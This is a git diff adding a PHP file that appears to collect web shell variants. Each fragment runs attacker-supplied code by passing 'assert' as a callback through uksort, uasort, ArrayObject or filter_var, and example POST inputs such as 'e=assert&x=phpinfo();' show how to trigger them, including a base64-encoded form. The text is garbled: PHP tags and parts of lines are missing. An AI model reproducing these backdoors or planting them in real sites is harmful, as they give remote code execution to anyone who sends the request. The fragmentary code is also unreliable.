diff --git a/php/2020.08.20.17.php b/php/2020.08.20.17.php new file mode 100644 index 0000000..5980136 --- /dev/null +++ b/php/2020.08.20.17.php @@ -0,0 +1,62 @@ + + +post: e=assert&x=phpinfo(); + + + +post: e=assert&x=phpinfo(); + + + +post: e=YXNzZXJ0&x=phpinfo(); + +uasort('assert'); +?> + + 1, $_REQUEST['x'] => 2); + uksort($arr, $e); +?> + +post: e=assert&x=phpinfo(); + + 1, $_REQUEST['x'] => 2)); + $arr->uksort('assert'); +?> + + + + + + 'assert')); +?> + + $_REQUEST['x']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); +?> +